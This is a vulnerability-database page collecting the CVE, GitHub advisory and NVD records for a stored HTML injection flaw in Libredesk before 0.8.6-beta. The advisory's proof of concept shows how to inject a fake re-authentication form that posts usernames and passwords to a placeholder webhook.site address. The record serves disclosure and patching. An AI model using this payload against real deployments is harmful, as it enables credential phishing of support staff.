cvelistv5 - cve-2025-68927

CVE-2025-68927 (GCVE-0-2025-68927)

Vulnerability from cvelistv5

Published

2025-12-27 00:04

Modified

2025-12-29 16:51

Severity ?

7.3 (High) - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:P

CWE

CWE-79 - Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Summary

Libredesk is a self-hosted customer support desk. Prior to version 0.8.6-beta, LibreDesk is vulnerable to stored HTML injection in the contact notes feature. When adding notes via POST /api/v1/contacts/{id}/notes, the backend automatically wraps user input in <p> tags. However, by intercepting the request and removing the <p> tag, an attacker can inject arbitrary HTML elements such as forms and images, which are then stored and rendered without proper sanitization. This can lead to phishing, CSRF-style forced actions, and UI redress attacks. This issue has been patched in version 0.8.6-beta.

References

URL

Tags

	security-advisories@github.com	https://github.com/abhinavxd/libredesk/commit/270347849943ac6a43e9fd6ebdc99c71841900eb
	security-advisories@github.com	https://github.com/abhinavxd/libredesk/security/advisories/GHSA-wh6m-h6f4-rjf4
	134c704f-9b21-4f2e-91b3-4a467353bcc0	https://github.com/abhinavxd/libredesk/security/advisories/GHSA-wh6m-h6f4-rjf4

Impacted products

	Vendor	Product	Version
	abhinavxd	libredesk	Version: < 0.8.6-beta

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2025-68927",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2025-12-29T16:43:28.357109Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-12-29T16:51:24.522Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "references": [
          {
            "tags": [
              "exploit"
            ],
            "url": "https://github.com/abhinavxd/libredesk/security/advisories/GHSA-wh6m-h6f4-rjf4"
          }
        ],
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "libredesk",
          "vendor": "abhinavxd",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 0.8.6-beta"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Libredesk is a self-hosted customer support desk. Prior to version 0.8.6-beta, LibreDesk is vulnerable to stored HTML injection in the contact notes feature. When adding notes via POST /api/v1/contacts/{id}/notes, the backend automatically wraps user input in \u003cp\u003e tags. However, by intercepting the request and removing the \u003cp\u003e tag, an attacker can inject arbitrary HTML elements such as forms and images, which are then stored and rendered without proper sanitization. This can lead to phishing, CSRF-style forced actions, and UI redress attacks. This issue has been patched in version 0.8.6-beta."
        }
      ],
      "metrics": [
        {
          "cvssV4_0": {
            "attackComplexity": "LOW",
            "attackRequirements": "NONE",
            "attackVector": "NETWORK",
            "baseScore": 7.3,
            "baseSeverity": "HIGH",
            "privilegesRequired": "NONE",
            "subAvailabilityImpact": "NONE",
            "subConfidentialityImpact": "NONE",
            "subIntegrityImpact": "NONE",
            "userInteraction": "PASSIVE",
            "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:P",
            "version": "4.0",
            "vulnAvailabilityImpact": "NONE",
            "vulnConfidentialityImpact": "HIGH",
            "vulnIntegrityImpact": "HIGH"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-79",
              "description": "CWE-79: Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-12-27T00:04:49.621Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/abhinavxd/libredesk/security/advisories/GHSA-wh6m-h6f4-rjf4",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/abhinavxd/libredesk/security/advisories/GHSA-wh6m-h6f4-rjf4"
        },
        {
          "name": "https://github.com/abhinavxd/libredesk/commit/270347849943ac6a43e9fd6ebdc99c71841900eb",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/abhinavxd/libredesk/commit/270347849943ac6a43e9fd6ebdc99c71841900eb"
        }
      ],
      "source": {
        "advisory": "GHSA-wh6m-h6f4-rjf4",
        "discovery": "UNKNOWN"
      },
      "title": "Improper Neutralization of  HTML Tags in a Web Page in libredesk"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2025-68927",
    "datePublished": "2025-12-27T00:04:49.621Z",
    "dateReserved": "2025-12-24T23:40:31.797Z",
    "dateUpdated": "2025-12-29T16:51:24.522Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2025-68927\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2025-12-27T01:15:42.570\",\"lastModified\":\"2025-12-29T17:15:47.500\",\"vulnStatus\":\"Awaiting Analysis\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Libredesk is a self-hosted customer support desk. Prior to version 0.8.6-beta, LibreDesk is vulnerable to stored HTML injection in the contact notes feature. When adding notes via POST /api/v1/contacts/{id}/notes, the backend automatically wraps user input in \u003cp\u003e tags. However, by intercepting the request and removing the \u003cp\u003e tag, an attacker can inject arbitrary HTML elements such as forms and images, which are then stored and rendered without proper sanitization. This can lead to phishing, CSRF-style forced actions, and UI redress attacks. This issue has been patched in version 0.8.6-beta.\"}],\"metrics\":{\"cvssMetricV40\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"4.0\",\"vectorString\":\"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\",\"baseScore\":7.3,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"attackRequirements\":\"NONE\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"PASSIVE\",\"vulnConfidentialityImpact\":\"HIGH\",\"vulnIntegrityImpact\":\"HIGH\",\"vulnAvailabilityImpact\":\"NONE\",\"subConfidentialityImpact\":\"NONE\",\"subIntegrityImpact\":\"NONE\",\"subAvailabilityImpact\":\"NONE\",\"exploitMaturity\":\"PROOF_OF_CONCEPT\",\"confidentialityRequirement\":\"NOT_DEFINED\",\"integrityRequirement\":\"NOT_DEFINED\",\"availabilityRequirement\":\"NOT_DEFINED\",\"modifiedAttackVector\":\"NOT_DEFINED\",\"modifiedAttackComplexity\":\"NOT_DEFINED\",\"modifiedAttackRequirements\":\"NOT_DEFINED\",\"modifiedPrivilegesRequired\":\"NOT_DEFINED\",\"modifiedUserInteraction\":\"NOT_DEFINED\",\"modifiedVulnConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedVulnIntegrityImpact\":\"NOT_DEFINED\",\"modifiedVulnAvailabilityImpact\":\"NOT_DEFINED\",\"modifiedSubConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedSubIntegrityImpact\":\"NOT_DEFINED\",\"modifiedSubAvailabilityImpact\":\"NOT_DEFINED\",\"Safety\":\"NOT_DEFINED\",\"Automatable\":\"NOT_DEFINED\",\"Recovery\":\"NOT_DEFINED\",\"valueDensity\":\"NOT_DEFINED\",\"vulnerabilityResponseEffort\":\"NOT_DEFINED\",\"providerUrgency\":\"NOT_DEFINED\"}}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-79\"}]}],\"references\":[{\"url\":\"https://github.com/abhinavxd/libredesk/commit/270347849943ac6a43e9fd6ebdc99c71841900eb\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/abhinavxd/libredesk/security/advisories/GHSA-wh6m-h6f4-rjf4\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/abhinavxd/libredesk/security/advisories/GHSA-wh6m-h6f4-rjf4\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\"}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2025-68927\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2025-12-29T16:43:28.357109Z\"}}}], \"references\": [{\"url\": \"https://github.com/abhinavxd/libredesk/security/advisories/GHSA-wh6m-h6f4-rjf4\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2025-12-29T16:43:30.934Z\"}}], \"cna\": {\"title\": \"Improper Neutralization of  HTML Tags in a Web Page in libredesk\", \"source\": {\"advisory\": \"GHSA-wh6m-h6f4-rjf4\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV4_0\": {\"version\": \"4.0\", \"baseScore\": 7.3, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:P\", \"userInteraction\": \"PASSIVE\", \"attackComplexity\": \"LOW\", \"attackRequirements\": \"NONE\", \"privilegesRequired\": \"NONE\", \"subIntegrityImpact\": \"NONE\", \"vulnIntegrityImpact\": \"HIGH\", \"subAvailabilityImpact\": \"NONE\", \"vulnAvailabilityImpact\": \"NONE\", \"subConfidentialityImpact\": \"NONE\", \"vulnConfidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"abhinavxd\", \"product\": \"libredesk\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 0.8.6-beta\"}]}], \"references\": [{\"url\": \"https://github.com/abhinavxd/libredesk/security/advisories/GHSA-wh6m-h6f4-rjf4\", \"name\": \"https://github.com/abhinavxd/libredesk/security/advisories/GHSA-wh6m-h6f4-rjf4\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/abhinavxd/libredesk/commit/270347849943ac6a43e9fd6ebdc99c71841900eb\", \"name\": \"https://github.com/abhinavxd/libredesk/commit/270347849943ac6a43e9fd6ebdc99c71841900eb\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Libredesk is a self-hosted customer support desk. Prior to version 0.8.6-beta, LibreDesk is vulnerable to stored HTML injection in the contact notes feature. When adding notes via POST /api/v1/contacts/{id}/notes, the backend automatically wraps user input in \u003cp\u003e tags. However, by intercepting the request and removing the \u003cp\u003e tag, an attacker can inject arbitrary HTML elements such as forms and images, which are then stored and rendered without proper sanitization. This can lead to phishing, CSRF-style forced actions, and UI redress attacks. This issue has been patched in version 0.8.6-beta.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-79\", \"description\": \"CWE-79: Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2025-12-27T00:04:49.621Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2025-68927\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2025-12-29T16:51:24.522Z\", \"dateReserved\": \"2025-12-24T23:40:31.797Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2025-12-27T00:04:49.621Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

ghsa-wh6m-h6f4-rjf4

Vulnerability from github

Published

2025-12-16 20:43

Modified

2025-12-26 17:25

Severity ?

7.3 (High) - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:P

Summary

Libredesk has Improper Neutralization of HTML Tags in a Web Page

Details

Summary

LibreDesk is vulnerable to stored HTML injection in the contact notes feature. When adding notes via POST /api/v1/contacts/{id}/notes, the backend automatically wraps user input in <p> tags. However, by intercepting the request and removing the <p> tag, an attacker can inject arbitrary HTML elements such as forms and images, which are then stored and rendered without proper sanitization. This can lead to phishing, CSRF-style forced actions, and UI redress attacks.

Details

When notes are added through the LibreDesk web application, the client sends note content wrapped inside <p> tags. The backend appears to trust this HTML structure and stores the content as-is.

By intercepting the request to:

POST /api/v1/contacts/3/notes

and removing the <p> wrapper, an attacker can submit arbitrary HTML content. The backend does not sanitize or validate the HTML payload before persisting it.

As a result:

Arbitrary HTML tags (e.g., <form>, <input>, <img>) are stored
The injected HTML is rendered when the notes are viewed in the application
No server-side HTML sanitization or allowlisting is enforced

This indicates that the application relies on client-side HTML formatting assumptions, which can be bypassed by modifying the request.

PoC

Log in to LibreDesk and open any contact.
Add a note normally via the UI.
Intercept the request to:

POST /api/v1/contacts/3/notes 4. Original request body (example):

json { "note": "<p>This is a normal note</p>" } 5. Modify the payload by removing the <p> tag and injecting arbitrary HTML:

json { "note": "<form action='https://webhook.site/xxxx' method='POST'> <input type='text' name='username' placeholder='Username'> <input type='password' name='password' placeholder='Password'> <input type='submit' value='Re-authenticate'> </form>" }

Forward the request.
View the contact note in the LibreDesk UI.

Result: The injected HTML form is rendered inside the application.

Impact

This is a stored HTML injection vulnerability affecting any user who can add or view contact notes.

Potential impact includes:

Credential phishing through injected forms
CSRF-style forced actions using HTML-only forms
UI redress and social engineering
Increased risk if notes are viewed by privileged users (e.g., admins or agents)

If the notes are shared across users or roles, this vulnerability can be abused to target multiple users, increasing severity.

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/abhinavxd/libredesk"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.8.6-beta"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-68927"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-79"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-12-16T20:43:16Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "### Summary\n\nLibreDesk is vulnerable to **stored HTML injection** in the contact notes feature. When adding notes via `POST /api/v1/contacts/{id}/notes`, the backend automatically wraps user input in `\u003cp\u003e` tags. However, by intercepting the request and removing the `\u003cp\u003e` tag, an attacker can inject arbitrary HTML elements such as forms and images, which are then stored and rendered without proper sanitization. This can lead to phishing, CSRF-style forced actions, and UI redress attacks.\n\n---\n\n### Details\n\nWhen notes are added through the LibreDesk web application, the client sends note content wrapped inside `\u003cp\u003e` tags. The backend appears to **trust this HTML structure** and stores the content as-is.\n\nBy intercepting the request to:\n\n```\nPOST /api/v1/contacts/3/notes\n```\n\nand **removing the `\u003cp\u003e` wrapper**, an attacker can submit arbitrary HTML content. The backend does not sanitize or validate the HTML payload before persisting it.\n\nAs a result:\n\n* Arbitrary HTML tags (e.g., `\u003cform\u003e`, `\u003cinput\u003e`, `\u003cimg\u003e`) are stored\n* The injected HTML is rendered when the notes are viewed in the application\n* No server-side HTML sanitization or allowlisting is enforced\n\nThis indicates that the application relies on **client-side HTML formatting assumptions**, which can be bypassed by modifying the request.\n\n---\n\n### PoC\n\n1. Log in to LibreDesk and open any contact.\n2. Add a note normally via the UI.\n3. Intercept the request to:\n\n   ```\n   POST /api/v1/contacts/3/notes\n   ```\n4. Original request body (example):\n\n   ```json\n   {\n     \"note\": \"\u003cp\u003eThis is a normal note\u003c/p\u003e\"\n   }\n   ```\n5. Modify the payload by removing the `\u003cp\u003e` tag and injecting arbitrary HTML:\n\n   ```json\n   {\n     \"note\": \"\u003cform action=\u0027https://webhook.site/xxxx\u0027 method=\u0027POST\u0027\u003e\n                \u003cinput type=\u0027text\u0027 name=\u0027username\u0027 placeholder=\u0027Username\u0027\u003e\n                \u003cinput type=\u0027password\u0027 name=\u0027password\u0027 placeholder=\u0027Password\u0027\u003e\n                \u003cinput type=\u0027submit\u0027 value=\u0027Re-authenticate\u0027\u003e\n              \u003c/form\u003e\"\n   }\n   ```\n\n6. Forward the request.\n7. View the contact note in the LibreDesk UI.\n\n**Result:**\nThe injected HTML form is rendered inside the application.\n\n\n---\n\n### Impact\n\nThis is a **stored HTML injection** vulnerability affecting any user who can add or view contact notes.\n\nPotential impact includes:\n\n* Credential phishing through injected forms\n* CSRF-style forced actions using HTML-only forms\n* UI redress and social engineering\n* Increased risk if notes are viewed by privileged users (e.g., admins or agents)\n\nIf the notes are shared across users or roles, this vulnerability can be abused to target multiple users, increasing severity.",
  "id": "GHSA-wh6m-h6f4-rjf4",
  "modified": "2025-12-26T17:25:18Z",
  "published": "2025-12-16T20:43:16Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/abhinavxd/libredesk/security/advisories/GHSA-wh6m-h6f4-rjf4"
    },
    {
      "type": "WEB",
      "url": "https://github.com/abhinavxd/libredesk/commit/270347849943ac6a43e9fd6ebdc99c71841900eb"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/abhinavxd/libredesk"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:P",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Libredesk has Improper Neutralization of  HTML Tags in a Web Page"
}

fkie_cve-2025-68927

Vulnerability from fkie_nvd

Published

2025-12-27 01:15

Modified

2025-12-29 17:15

Severity ?

7.3 (High) - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:P

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/abhinavxd/libredesk/commit/270347849943ac6a43e9fd6ebdc99c71841900eb
	security-advisories@github.com	https://github.com/abhinavxd/libredesk/security/advisories/GHSA-wh6m-h6f4-rjf4
	134c704f-9b21-4f2e-91b3-4a467353bcc0	https://github.com/abhinavxd/libredesk/security/advisories/GHSA-wh6m-h6f4-rjf4

Impacted products

	Vendor	Product	Version

JSON

To clipboard

{
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Libredesk is a self-hosted customer support desk. Prior to version 0.8.6-beta, LibreDesk is vulnerable to stored HTML injection in the contact notes feature. When adding notes via POST /api/v1/contacts/{id}/notes, the backend automatically wraps user input in \u003cp\u003e tags. However, by intercepting the request and removing the \u003cp\u003e tag, an attacker can inject arbitrary HTML elements such as forms and images, which are then stored and rendered without proper sanitization. This can lead to phishing, CSRF-style forced actions, and UI redress attacks. This issue has been patched in version 0.8.6-beta."
    }
  ],
  "id": "CVE-2025-68927",
  "lastModified": "2025-12-29T17:15:47.500",
  "metrics": {
    "cvssMetricV40": [
      {
        "cvssData": {
          "Automatable": "NOT_DEFINED",
          "Recovery": "NOT_DEFINED",
          "Safety": "NOT_DEFINED",
          "attackComplexity": "LOW",
          "attackRequirements": "NONE",
          "attackVector": "NETWORK",
          "availabilityRequirement": "NOT_DEFINED",
          "baseScore": 7.3,
          "baseSeverity": "HIGH",
          "confidentialityRequirement": "NOT_DEFINED",
          "exploitMaturity": "PROOF_OF_CONCEPT",
          "integrityRequirement": "NOT_DEFINED",
          "modifiedAttackComplexity": "NOT_DEFINED",
          "modifiedAttackRequirements": "NOT_DEFINED",
          "modifiedAttackVector": "NOT_DEFINED",
          "modifiedPrivilegesRequired": "NOT_DEFINED",
          "modifiedSubAvailabilityImpact": "NOT_DEFINED",
          "modifiedSubConfidentialityImpact": "NOT_DEFINED",
          "modifiedSubIntegrityImpact": "NOT_DEFINED",
          "modifiedUserInteraction": "NOT_DEFINED",
          "modifiedVulnAvailabilityImpact": "NOT_DEFINED",
          "modifiedVulnConfidentialityImpact": "NOT_DEFINED",
          "modifiedVulnIntegrityImpact": "NOT_DEFINED",
          "privilegesRequired": "NONE",
          "providerUrgency": "NOT_DEFINED",
          "subAvailabilityImpact": "NONE",
          "subConfidentialityImpact": "NONE",
          "subIntegrityImpact": "NONE",
          "userInteraction": "PASSIVE",
          "valueDensity": "NOT_DEFINED",
          "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
          "version": "4.0",
          "vulnAvailabilityImpact": "NONE",
          "vulnConfidentialityImpact": "HIGH",
          "vulnIntegrityImpact": "HIGH",
          "vulnerabilityResponseEffort": "NOT_DEFINED"
        },
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2025-12-27T01:15:42.570",
  "references": [
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/abhinavxd/libredesk/commit/270347849943ac6a43e9fd6ebdc99c71841900eb"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/abhinavxd/libredesk/security/advisories/GHSA-wh6m-h6f4-rjf4"
    },
    {
      "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
      "url": "https://github.com/abhinavxd/libredesk/security/advisories/GHSA-wh6m-h6f4-rjf4"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Awaiting Analysis",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-79"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    }
  ]
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
Confirmed: The vulnerability is confirmed from an analyst perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
Patched: This vulnerability was successfully patched by the user reporting the sighting.
Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
Not confirmed: The user expresses doubt about the veracity of the vulnerability.
Not patched: This vulnerability was not successfully patched by the user reporting the sighting.

Action not permitted

CVE-2025-68927 (GCVE-0-2025-68927)

Vulnerability from cvelistv5

ghsa-wh6m-h6f4-rjf4

Vulnerability from github

Summary

Details

PoC

Impact

fkie_cve-2025-68927

Vulnerability from fkie_nvd

Tags

Sightings

Nomenclature